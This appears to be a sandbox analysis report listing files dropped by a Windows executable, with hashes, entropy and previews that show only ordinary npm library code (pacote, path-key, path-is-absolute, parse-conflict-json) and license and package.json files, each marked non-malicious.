              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:#!/usr/bin/env node..const run = conf => {. const pacote = require('../'). switch (conf._[0]) {. case 'resolve':. case 'manifest':. case 'packument':. if (conf._[0] === 'resolve' && conf.long) {. return pacote.manifest(conf._[1], conf).then(mani => ({. resolved: mani._resolved,. integrity: mani._integrity,. from: mani._from,. })). }. return pacote[conf._[0]](conf._[1], conf).. case 'tarball':. if (!conf._[2] || conf._[2] === '-') {. return pacote.tarball.stream(conf._[1], stream => {. stream.pipe(. conf.testStdout ||. /* istanbul ignore next */. process.stdout. ). // make sure it resolves something falsey. return stream.promise().then(() => {. return false. }). }, conf). } else {. return pacote.tarball.file(conf._[1], conf._[2], conf). }.. case 'extract':. return pacote.extract(conf._[1
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3230
              Entropy (8bit):4.605747958303223
              Encrypted:false
              SSDEEP:
              MD5:997570A9903B1557969BADF71983099B
              SHA1:7ED38C19C5B9D8B97F67CE82AF3BA9449EF72E8F
              SHA-256:3898E42E6F8D910FB939DD61BD5033F81A26881E1CD97C16F5DAE3C9A4D2C581
              SHA-512:C6BA3F9F9EF776FEB528F3D5FED2F9397E07675621A3FBF0899D3A4490C4ADC5B7B14E81F63B527103EF9CC26D48D400E4C8609BD7416E1B029490AA8163C77E
              Malicious:false
              Reputation:unknown
              Preview:const Fetcher = require('./fetcher.js').const FileFetcher = require('./file.js').const { Minipass } = require('minipass').const tarCreateOptions = require('./util/tar-create-options.js').const packlist = require('npm-packlist').const tar = require('tar').const _prepareDir = Symbol('_prepareDir').const { resolve } = require('path').const _readPackageJson = Symbol.for('package.Fetcher._readPackageJson')..const runScript = require('@npmcli/run-script')..const _tarballFromResolved = Symbol.for('pacote.Fetcher._tarballFromResolved').class DirFetcher extends Fetcher {. constructor (spec, opts) {. super(spec, opts). // just the fully resolved filename. this.resolved = this.spec.fetchSpec.. this.tree = opts.tree || null. this.Arborist = opts.Arborist || null. }.. // exposes tarCreateOptions as public API. static tarCreateOptions (manifest) {. return tarCreateOptions(manifest). }.. get types () {. return ['directory']. }.. [_prepareDir] () {. return this.manifest
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):17137
              Entropy (8bit):4.6881219370856355
              Encrypted:false
              SSDEEP:
              MD5:552C8F10ADA6A090CFADDE595536DA75
              SHA1:E056550905D741E3C41BC3E9DAD15B75F5A7D331
              SHA-256:07F98090EE5BC371E74B80C9963540EA437DC813DF06E66FF87F9586EDA93A13
              SHA-512:53E3388CBE6885D4F909749AAE323F3763815BA9A2BA241AE525E89E62D61587054FFA842008C740F6E0F09655AB65C4E66BBFC55FC2A6D167652CD6710F0CB9
              Malicious:false
              Reputation:unknown
              Preview:// This is the base class that the other fetcher types in lib.// all descend from..// It handles the unpacking and retry logic that is shared among.// all of the other Fetcher types...const npa = require('npm-package-arg').const ssri = require('ssri').const { promisify } = require('util').const { basename, dirname } = require('path').const tar = require('tar').const log = require('proc-log').const retry = require('promise-retry').const fs = require('fs/promises').const fsm = require('fs-minipass').const cacache = require('cacache').const isPackageBin = require('./util/is-package-bin.js').const removeTrailingSlashes = require('./util/trailing-slashes.js').const getContents = require('@npmcli/installed-package-contents').const readPackageJsonFast = require('read-package-json-fast').const readPackageJson = promisify(require('read-package-json')).const { Minipass } = require('minipass')..const cacheDir = require('./util/cache-dir.js')..// Private methods..// Child classes should not have t
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2711
              Entropy (8bit):4.564047127054555
              Encrypted:false
              SSDEEP:
              MD5:03C00C69BB87FCBE94C70DF7ABF86315
              SHA1:E8C17AD0B7ED3F3C4F63B2CCAD5FF098F3B1C6C8
              SHA-256:FDCBE028DBDBF86C8D8914C031870DE79C5E5638B50472D7A54F4A8B30F3290D
              SHA-512:D7C59F8099985477C12ED715EDADC3A706BBB767619A31FDA61590E5A8B619A9C5275F52B72AD7707E530309E97A57D954922FE016968AB8F8A1260A6FA0D1C9
              Malicious:false
              Reputation:unknown
              Preview:const Fetcher = require('./fetcher.js').const fsm = require('fs-minipass').const cacache = require('cacache').const _tarballFromResolved = Symbol.for('pacote.Fetcher._tarballFromResolved').const _exeBins = Symbol('_exeBins').const { resolve } = require('path').const fs = require('fs').const _readPackageJson = Symbol.for('package.Fetcher._readPackageJson')..class FileFetcher extends Fetcher {. constructor (spec, opts) {. super(spec, opts). // just the fully resolved filename. this.resolved = this.spec.fetchSpec. }.. get types () {. return ['file']. }.. manifest () {. if (this.package) {. return Promise.resolve(this.package). }.. // have to unpack the tarball for this.. return cacache.tmp.withTmp(this.cache, this.opts, dir =>. this.extract(dir). .then(() => this[_readPackageJson](dir + '/package.json')). .then(mani => this.package = {. ...mani,. _integrity: this.integrity && String(this.integrity),. _resolved
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):11756
              Entropy (8bit):4.639690535422432
              Encrypted:false
              SSDEEP:
              MD5:7F4F105D5835EE7A3A985DDAE0C32908
              SHA1:114B3219DF8078895422BF242F8CC8CD9BBC15E2
              SHA-256:CEE66847D4F8B52D6C4A5BD767BB7DE2AB9C4F1BFC244B885D890558B4223C93
              SHA-512:2A195813AF162ACFCC6004B1AEB3C04EB87BB6FEB2EC344A1BB0253A4E4A3A04F6ACE52A78AE8E376F5C0D8B1030530F9D2482564EAD5CF5738D339AF0A69AFF
              Malicious:false
              Reputation:unknown
              Preview:const Fetcher = require('./fetcher.js').const FileFetcher = require('./file.js').const RemoteFetcher = require('./remote.js').const DirFetcher = require('./dir.js').const hashre = /^[a-f0-9]{40}$/.const git = require('@npmcli/git').const pickManifest = require('npm-pick-manifest').const npa = require('npm-package-arg').const { Minipass } = require('minipass').const cacache = require('cacache').const log = require('proc-log').const npm = require('./util/npm.js')..const _resolvedFromRepo = Symbol('_resolvedFromRepo').const _resolvedFromHosted = Symbol('_resolvedFromHosted').const _resolvedFromClone = Symbol('_resolvedFromClone').const _tarballFromResolved = Symbol.for('pacote.Fetcher._tarballFromResolved').const _addGitSha = Symbol('_addGitSha').const addGitSha = require('./util/add-git-sha.js').const _clone = Symbol('_clone').const _cloneHosted = Symbol('_cloneHosted').const _cloneRepo = Symbol('_cloneRepo').const _setResolvedWithSha = Symbol('_setResolvedWithSha').const _prepareDir = S
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):826
              Entropy (8bit):4.680516816553542
              Encrypted:false
              SSDEEP:
              MD5:ED7472A3CA42D349321C0A76FFE138FE
              SHA1:3EEA7A696FBA09C079571B63C23F83B96BE2EFDF
              SHA-256:D288C44E70E5BCA9B5BD876E28337D9A5828CF517CAB5BDB29608A23BE42D253
              SHA-512:D4D14E3DAE9DA8E88D4AF73AF50BC805E085D1AB073100C882667AEE798B00EC0E500CC421D841787EB57CC6BC7CC667A9C768ECBEC9B45DD94D69346CADD665
              Malicious:false
              Reputation:unknown
              Preview:const { get } = require('./fetcher.js').const GitFetcher = require('./git.js').const RegistryFetcher = require('./registry.js').const FileFetcher = require('./file.js').const DirFetcher = require('./dir.js').const RemoteFetcher = require('./remote.js')..module.exports = {. GitFetcher,. RegistryFetcher,. FileFetcher,. DirFetcher,. RemoteFetcher,. resolve: (spec, opts) => get(spec, opts).resolve(),. extract: (spec, dest, opts) => get(spec, opts).extract(dest),. manifest: (spec, opts) => get(spec, opts).manifest(),. tarball: (spec, opts) => get(spec, opts).tarball(),. packument: (spec, opts) => get(spec, opts).packument(),.}.module.exports.tarball.stream = (spec, handler, opts) =>. get(spec, opts).tarballStream(handler).module.exports.tarball.file = (spec, dest, opts) =>. get(spec, opts).tarballFile(dest).
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):13383
              Entropy (8bit):4.508705092780298
              Encrypted:false
              SSDEEP:
              MD5:90C317C2D26103B69952B220B1468BD4
              SHA1:B163DB0301DE188B60A70FE6E10542A400A1FA17
              SHA-256:FCAFF0F1F4A446C8BE8768CE759BE7DE81D02BA78E974181DE359EDA3EAD7A7D
              SHA-512:79D2635A42C75C30F6532A0A045CB6FA2FCD6B1AB63CF6893A6C45E3733017E871DED303068DF16FE603848E2F32DC855262B2937038DECAD45BE4EF5456586B
              Malicious:false
              Reputation:unknown
              Preview:const Fetcher = require('./fetcher.js').const RemoteFetcher = require('./remote.js').const _tarballFromResolved = Symbol.for('pacote.Fetcher._tarballFromResolved').const pacoteVersion = require('../package.json').version.const removeTrailingSlashes = require('./util/trailing-slashes.js').const rpj = require('read-package-json-fast').const pickManifest = require('npm-pick-manifest').const ssri = require('ssri').const crypto = require('crypto').const npa = require('npm-package-arg').const sigstore = require('sigstore')..// Corgis are cute. .....const corgiDoc = 'application/vnd.npm.install-v1+json; q=1.0, application/json; q=0.8, */*'.const fullDoc = 'application/json'..const fetch = require('npm-registry-fetch')..const _headers = Symbol('_headers').class RegistryFetcher extends Fetcher {. constructor (spec, opts) {. super(spec, opts).. // you usually don't want to fetch the same packument multiple times in. // the span of a given script or command, no matter how many pacot
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2801
              Entropy (8bit):4.721313272602944
              Encrypted:false
              SSDEEP:
              MD5:1B56A07B64A9F60CE0A604E8E88FCEA0
              SHA1:EA413D340217780CA1F2E61578DD9C02C6B7700D
              SHA-256:1AAC5CE50C936A606DDFB91FAD96BFDE8E5AC0796F9038D3BE702C874221CA0F
              SHA-512:0C1D193184724071117D128FD2728FF8A2AEB40898644E7B617DBFE11224494FCD6D1D8FE57C19AFF028AE5B184527DAC3252C7080615567AE0EFCF53EF78C31
              Malicious:false
              Reputation:unknown
              Preview:const Fetcher = require('./fetcher.js').const FileFetcher = require('./file.js').const _tarballFromResolved = Symbol.for('pacote.Fetcher._tarballFromResolved').const pacoteVersion = require('../package.json').version.const fetch = require('npm-registry-fetch').const { Minipass } = require('minipass')..const _cacheFetches = Symbol.for('pacote.Fetcher._cacheFetches').const _headers = Symbol('_headers').class RemoteFetcher extends Fetcher {. constructor (spec, opts) {. super(spec, opts). this.resolved = this.spec.fetchSpec. const resolvedURL = new URL(this.resolved). if (this.replaceRegistryHost !== 'never'. && (this.replaceRegistryHost === 'always'. || this.replaceRegistryHost === resolvedURL.host)) {. this.resolved = new URL(resolvedURL.pathname, this.registry).href. }.. // nam is a fermented pork sausage that is good to eat. const nameat = this.spec.name ? `${this.spec.name}@` : ''. this.pkgid = opts.pkgid ? opts.pkgid : `remote:${nameat}${this.r
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):427
              Entropy (8bit):4.586785237838465
              Encrypted:false
              SSDEEP:
              MD5:6110A47A8C9FE890D8B461C6B172EBA3
              SHA1:3A8E30C81041510C0D591C521EC196A42803AB27
              SHA-256:971AB30CF8AEFFEB2EBE8D52578A8FBF75FA2E92B4A658523D74955055ACC3D3
              SHA-512:E3124A2223F02DA26519EB2CA35798BEEB3D209155699EF42CA43D08AE0BDE1E6824FD90A205766A843DBE678EC3EA7468EC5185FCBFC68315C226EFA86CE77B
              Malicious:false
              Reputation:unknown
              Preview:// add a sha to a git remote url spec.const addGitSha = (spec, sha) => {. if (spec.hosted) {. const h = spec.hosted. const opt = { noCommittish: true }. const base = h.https && h.auth ? h.https(opt) : h.shortcut(opt).. return `${base}#${sha}`. } else {. // don't use new URL for this, because it doesn't handle scp urls. return spec.rawSpec.replace(/#.*$/, '') + `#${sha}`. }.}..module.exports = addGitSha.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):589
              Entropy (8bit):4.836250397754049
              Encrypted:false
              SSDEEP:
              MD5:ECFC4A4EA97B10FD4B3BB7B506989657
              SHA1:EC9A36E66086DB78C1063CDAFA626B1E54C87AEB
              SHA-256:0505B6065337639A8DEF75D2BCA888B2B60C770B4DFEE3F95D690D2C33C5CAC6
              SHA-512:CB73CAD6587CBF1E6A5BB347D2CDA73E89F22A58C71068A4AA307B23F0B41B0FD399345E08C9624AB5F4BB62723759A540852E7FB3F55CB736218B79D8943B77
              Malicious:false
              Reputation:unknown
              Preview:const os = require('os').const { resolve } = require('path')..module.exports = (fakePlatform = false) => {. const temp = os.tmpdir(). const uidOrPid = process.getuid ? process.getuid() : process.pid. const home = os.homedir() || resolve(temp, 'npm-' + uidOrPid). const platform = fakePlatform || process.platform. const cacheExtra = platform === 'win32' ? 'npm-cache' : '.npm'. const cacheRoot = (platform === 'win32' && process.env.LOCALAPPDATA) || home. return {. cacache: resolve(cacheRoot, cacheExtra, '_cacache'),. tufcache: resolve(cacheRoot, cacheExtra, '_tuf'),. }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):824
              Entropy (8bit):4.733256590217775
              Encrypted:false
              SSDEEP:
              MD5:7980452057A21A871243C3BA2A787AF8
              SHA1:9DFD9C828926E1A04EF7382567E0907707343E7C
              SHA-256:4814CC5D581AC2D21FFEDD16B657FA7289B32309733E83B1F33A0F159A8D2983
              SHA-512:280FA30D12CBAC1E903C1C89C5D763E84044076B92155DADC1DFE4D0F782C9A02B7A10A42C6CC1D1A908C009DCFE33CDC0FC107B07A0F4C44E3963D6A952FDCF
              Malicious:false
              Reputation:unknown
              Preview:// Function to determine whether a path is in the package.bin set..// Used to prevent issues when people publish a package from a.// windows machine, and then install with --no-bin-links..//.// Note: this is not possible in remote or file fetchers, since.// we don't have the manifest until AFTER we've unpacked. But the.// main use case is registry fetching with git a distant second,.// so that's an acceptable edge case to not handle...const binObj = (name, bin) =>. typeof bin === 'string' ? { [name]: bin } : bin..const hasBin = (pkg, path) => {. const bin = binObj(pkg.name, pkg.bin). const p = path.replace(/^[^\\/]*\//, ''). for (const kv of Object.entries(bin)) {. if (kv[1] === p) {. return true. }. }. return false.}..module.exports = (pkg, path) =>. pkg && pkg.bin ? hasBin(pkg, path) : false.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):567
              Entropy (8bit):4.690600672117175
              Encrypted:false
              SSDEEP:
              MD5:7E01E9213284E62CDC62F1CE72AEB9D7
              SHA1:A0B978F93DEDEEF575EF50783F0824C5D7AB412D
              SHA-256:7CAA5A0E9C7ABCF7E902911EC8523BA9264B5731122246CFA54207223B05E9F8
              SHA-512:955203998E838BAA61532BA451A5748D69EF385326EF1407BDA16A8F510E41E5930481C013EC54C59707983C3AF5AD5CFE2E6571BBE7D515C36A2D3414D6DAF3
              Malicious:false
              Reputation:unknown
              Preview:// run an npm command.const spawn = require('@npmcli/promise-spawn')..module.exports = (npmBin, npmCommand, cwd, env, extra) => {. const isJS = npmBin.endsWith('.js'). const cmd = isJS ? process.execPath : npmBin. const args = (isJS ? [npmBin] : []).concat(npmCommand). // when installing to run the `prepare` script for a git dep, we need. // to ensure that we don't run into a cycle of checking out packages. // in temp directories. this lets us link previously-seen repos that. // are also being prepared... return spawn(cmd, args, { cwd, env }, extra).}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):914
              Entropy (8bit):4.747366713007717
              Encrypted:false
              SSDEEP:
              MD5:4791C6B5159C8F1D62CEC3209ACE5D31
              SHA1:09C600D872629411E58A3F56EE6BD15B41205A10
              SHA-256:87C387D44FEA5D1AAEF41DECD6896E19C45A8A8DFD560334777DB2F2CF02A840
              SHA-512:1844C94FA955C5F9B8005457968B460A0853F12AE7E9E585F90964588A700CECB0A9FD0950688664C268D549F814713451069D11DF199168A4EC547D5E4001FA
              Malicious:false
              Reputation:unknown
              Preview:const isPackageBin = require('./is-package-bin.js')..const tarCreateOptions = manifest => ({. cwd: manifest._resolved,. prefix: 'package/',. portable: true,. gzip: {. // forcing the level to 9 seems to avoid some. // platform specific optimizations that cause. // integrity mismatch errors due to differing. // end results after compression. level: 9,. },.. // ensure that package bins are always executable. // Note that npm-packlist is already filtering out. // anything that is not a regular file, ignored by. // .npmignore or package.json "files", etc.. filter: (path, stat) => {. if (isPackageBin(manifest, path)) {. stat.mode |= 0o111. }. return true. },.. // Provide a specific date in the 1980s for the benefit of zip,. // which is confounded by files dated at the Unix epoch 0.. mtime: new Date('1985-10-26T08:15:00.000Z'),.})..module.exports = tarCreateOptions.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):238
              Entropy (8bit):4.537909268383396
              Encrypted:false
              SSDEEP:
              MD5:202E76B0ED13E0325EA83ED4CDFA6140
              SHA1:545F0E7C53F1476B952DA9B9FBA66E7AFD68F087
              SHA-256:D41ED7D724EDD3CE667E60959D63C22DA512954912074F2AEB1D986EE99B075F
              SHA-512:BCB332975869CD6675E332A5CA95C4F5A7999191C57B78D459B634300B8DF72A1928737414A471F9C87A5D2C97DA894DCC24BF018388A5D23685718F97C2F525
              Malicious:false
              Reputation:unknown
              Preview:const removeTrailingSlashes = (input) => {. // in order to avoid regexp redos detection. let output = input. while (output.endsWith('/')) {. output = output.slice(0, -1). }. return output.}..module.exports = removeTrailingSlashes.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):2006
              Entropy (8bit):4.700494523620594
              Encrypted:false
              SSDEEP:
              MD5:673482746A454D529E867E266C7FA57C
              SHA1:C9DC22539653FE4854F183367641227E52A0F047
              SHA-256:B0D4F7B9CAC0E09C4569D6BC91A2D6AB091C9E7FCD65C174F653EFE8C3EC5D6B
              SHA-512:5F17EDDD6D0F656F0E456983724E91C87287388BA541EC8D2A9B2DFAE64AC40FCBF945D70419401BCDC6C38718DBEEF559182FDD41EF22B8FDD64AC077C77A4A
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "pacote",. "version": "17.0.4",. "description": "JavaScript package downloader",. "author": "GitHub Inc.",. "bin": {. "pacote": "lib/bin.js". },. "license": "ISC",. "main": "lib/index.js",. "scripts": {. "test": "tap",. "snap": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "lintfix": "npm run lint -- --fix",. "posttest": "npm run lint",. "template-oss-apply": "template-oss-apply --force". },. "tap": {. "timeout": 300,. "nyc-arg": [. "--exclude",. "tap-snapshots/**". ]. },. "devDependencies": {. "@npmcli/arborist": "^6.0.0 || ^6.0.0-pre.0",. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.18.0",. "hosted-git-info": "^7.0.0",. "mutate-fs": "^2.1.1",. "nock": "^13.2.4",. "npm-registry-mock": "^1.3.2",. "tap": "^16.0.1". },. "files": [. "bin/",. "lib/". ],. "keywords": [. "packages",. "npm",. "git". ],. "dependencies": {. "@npmcli/git
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2921
              Entropy (8bit):4.910200054539036
              Encrypted:false
              SSDEEP:
              MD5:79F39ABCB65AA5A1E290DBB80BF196C3
              SHA1:E888A33F993F2438A92EB31D97889DD6CE34C60A
              SHA-256:4E13740012D8864FFED7F6C4A4CAF2CE7008F654BF1B3D02494BC9ECB4E7E6EE
              SHA-512:A3BAC97BAA15BD614C11E3DBF2E18559EA4C0F3D75665D5BBD47DFF1591ED9CF99961FDF605334FCCE2F788E0360ADA94D825757B6B8AD5A11A5BD829182B680
              Malicious:false
              Reputation:unknown
              Preview:const parseJSON = require('json-parse-even-better-errors').const { diff } = require('just-diff').const { diffApply } = require('just-diff-apply')..const globalObjectProperties = Object.getOwnPropertyNames(Object.prototype)..const stripBOM = content => {. content = content.toString(). // Remove byte order marker. This catches EF BB BF (the UTF-8 BOM). // because the buffer-to-string conversion in `fs.readFileSync()`. // translates it to FEFF, the UTF-16 BOM.. if (content.charCodeAt(0) === 0xFEFF) {. content = content.slice(1). }. return content.}..const PARENT_RE = /\|{7,}/g.const OURS_RE = /<{7,}/g.const THEIRS_RE = /={7,}/g.const END_RE = />{7,}/g..const isDiff = str =>. str.match(OURS_RE) && str.match(THEIRS_RE) && str.match(END_RE)..const parseConflictJSON = (str, reviver, prefer) => {. prefer = prefer || 'ours'. if (prefer !== 'theirs' && prefer !== 'ours') {. throw new TypeError('prefer param must be "ours" or "theirs" if set'). }.. str = stripBOM(str).. if (!is
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1212
              Entropy (8bit):4.741083276345625
              Encrypted:false
              SSDEEP:
              MD5:64851A6C20734ED832A7ACD3DB36816C
              SHA1:E6E2B7AAA5EFA099A4A9A389030E5E2E28BF9775
              SHA-256:23BAD6EA0FE96D214D998A86FF254B330C1E5695D346E6385A78B5E7DE7E74C4
              SHA-512:56C23A093EDDCF422753FB5DB849B4BD3CB8991562D3173B55339488FF00169A5B7D15228B6213F2BD0760BEFC491283A7BF52E80448B0CB3D5F04F4D403E669
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "parse-conflict-json",. "version": "3.0.1",. "description": "Parse a JSON string that has git merge conflicts, resolving if possible",. "author": "GitHub Inc.",. "license": "ISC",. "main": "lib",. "scripts": {. "test": "tap",. "snap": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "lintfix": "npm run lint -- --fix",. "posttest": "npm run lint",. "template-oss-apply": "template-oss-apply --force". },. "tap": {. "check-coverage": true,. "nyc-arg": [. "--exclude",. "tap-snapshots/**". ]. },. "devDependencies": {. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.12.0",. "tap": "^16.0.1". },. "dependencies": {. "json-parse-even-better-errors": "^3.0.0",. "just-diff": "^6.0.0",. "just-diff-apply": "^5.2.0". },. "repository": {. "type": "git",. "url": "https://github.com/npm/parse-conflict-json.git". },. "files": [. "bin/",. "lib/". ],. "engines": {.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):611
              Entropy (8bit):5.460683234839858
              Encrypted:false
              SSDEEP:
              MD5:135A9DC74DC76B698C2ABEAAA165F889
              SHA1:6DE38A82F68960DE2BD07FD9114541F02BEE2F62
              SHA-256:4EB1119C3EECCC4D8E8841B77D062ABAF4572B332801F5B16175BC3311B5D8F1
              SHA-512:A81B8BCA8B071D1D6B86DB867A832528C5FB65507A1A2E6FC39306ADBD3D795DA932AC73BE27BBF7D496F70242F07DC58657033D2CA9D85B520C27C01E9322C2
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..function posix(path) {..return path.charAt(0) === '/';.}..function win32(path) {..// https://github.com/nodejs/node/blob/b3fcc245fb25539909ef1d5eaa01dbf92e168633/lib/path.js#L56..var splitDeviceRe = /^([a-zA-Z]:|[\\\/]{2}[^\\\/]+[\\\/]+[^\\\/]+)?([\\\/])?([\s\S]*?)$/;..var result = splitDeviceRe.exec(path);..var device = result[1] || '';..var isUnc = Boolean(device && device.charAt(1) !== ':');...// UNC paths are always absolute..return Boolean(result[2] || isUnc);.}..module.exports = process.platform === 'win32' ? win32 : posix;.module.exports.posix = posix;.module.exports.win32 = win32;.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1119
              Entropy (8bit):5.1078795238525405
              Encrypted:false
              SSDEEP:
              MD5:A12EBCA0510A773644101A99A867D210
              SHA1:0C94F137F6E0536DB8CB2622A9DC84253B91B90C
              SHA-256:6FB9754611C20F6649F68805E8C990E83261F29316E29DE9E6CEDAE607B8634C
              SHA-512:AE79E7A4209A451AEF6B78F7B0B88170E7A22335126AC345522BF4EAFE0818DA5865AAE1507C5DC0224EF854548C721DF9A84371822F36D50CBCD97FA946EEE9
              Malicious:false
              Reputation:unknown
              Preview:The MIT License (MIT)..Copyright (c) Sindre Sorhus <sindresorhus@gmail.com> (sindresorhus.com)..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TO
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):733
              Entropy (8bit):4.449228449672791
              Encrypted:false
              SSDEEP:
              MD5:EF6E018BDF67B82AB1285BC799B5367B
              SHA1:51B80416EA8AFF0F6F04B15EE2E114250BA1A14C
              SHA-256:BE5B83877F6998B840B9365D7AB77E885F0D583337826C22DACCAEB6E303FD4C
              SHA-512:2217A53408857A99AC9DC05C09B05558089FD4BC74501484452BF513EF1008259D9E9588EE82465404CD13E093105A6932C1B77AB2D44302C0E4AABE0245D2E4
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "path-is-absolute",. "version": "1.0.1",. "description": "Node.js 0.12 path.isAbsolute() ponyfill",. "license": "MIT",. "repository": "sindresorhus/path-is-absolute",. "author": {. "name": "Sindre Sorhus",. "email": "sindresorhus@gmail.com",. "url": "sindresorhus.com". },. "engines": {. "node": ">=0.10.0". },. "scripts": {. "test": "xo && node test.js". },. "files": [. "index.js". ],. "keywords": [. "path",. "paths",. "file",. "dir",. "absolute",. "isabsolute",. "is-absolute",. "built-in",. "util",. "utils",. "core",. "ponyfill",. "polyfill",. "shim",. "is",. "detect",. "check". ],. "devDependencies": {. "xo": "^0.16.0". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):415
              Entropy (8bit):4.9786257376716465
              Encrypted:false
              SSDEEP:
              MD5:BA81073459FE0D668BA31F0F746399C9
              SHA1:B3752B76E3E5051C5F021440D27958CF883F3136
              SHA-256:FDBAFDC163F668FE325333D62387365C9B074E01253E32824A4DBF5CC552705D
              SHA-512:5BD337C8F3EB7D60F976E78ECCB320A26AB57B2B018F295FD887E92785970C314A69A69EC81541F01E4EEAA60FD4F05BFC4632AA734C9546EF408DB604C72207
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..const pathKey = (options = {}) => {..const environment = options.env || process.env;..const platform = options.platform || process.platform;...if (platform !== 'win32') {...return 'PATH';..}...return Object.keys(environment).reverse().find(key => key.toUpperCase() === 'PATH') || 'Path';.};..module.exports = pathKey;.// TODO: Remove this for the next major release.module.exports.default = pathKey;.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):650
              Entropy (8bit):4.859853975989725
              Encrypted:false
              SSDEEP:
              MD5:6BD767B83CB2681FFE6D7EB277A12214
              SHA1:F330C46F59DBDD92DDDF8A2CFC2C1569B469BDD2
              SHA-256:25594DAB72681C910D9CC919263A4DAF27D77A75E0D2C26A4D958D6D6B798F86
              SHA-512:EA758C1E609BF65C3ECC0CD55A5020C6C00BD7FE15FFB0DA3191C587D0A01E4E0E0F37811CDAECE429D17AD0D84BA2BC97AC196A1941BEBD03603C3F13752F83
              Malicious:false
              Reputation:unknown
              Preview:{.."name": "path-key",.."version": "3.1.1",.."description": "Get the PATH environment variable key cross-platform",.."license": "MIT",.."repository": "sindresorhus/path-key",.."author": {..."name": "Sindre Sorhus",..."email": "sindresorhus@gmail.com",..."url": "sindresorhus.com"..},.."engines": {..."node": ">=8"..},.."scripts": {..."test": "xo && ava && tsd"..},.."files": [..."index.js",..."index.d.ts"..],.."keywords": [..."path",..."key",..."environment",..."env",..."variable",..."var",..."get",..."cross-platform",..."windows"..],.."devDependencies": {..."@types/node": "^11.13.0",..."ava": "^1.4.1",..."tsd": "^0.7.2",..."xo": "^0.24.0"..}.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):65859
              Entropy (8bit):4.383304441967824
              Encrypted:false
              SSDEEP:
              MD5:6DA76CA7DB40A13B2EDC8C53B7D58F53
              SHA1:43DA5A13DDE43627B01A027FA6271A1C1219539D
              SHA-256:C2CC18DE6310E97FE3D9C3850C028918C78054D8C79A1CDE825C7BF0BBCBD73C
              SHA-512:994A4B0B4E9BC8D11561F60D28D2CEB738456E84EDE9B7A3501399F4E6C016E0BA0459096068DC637B4518F0A6B26F64141AE32428CABA918AADB3CAB9ACA47B
              Malicious:false
              Reputation:unknown
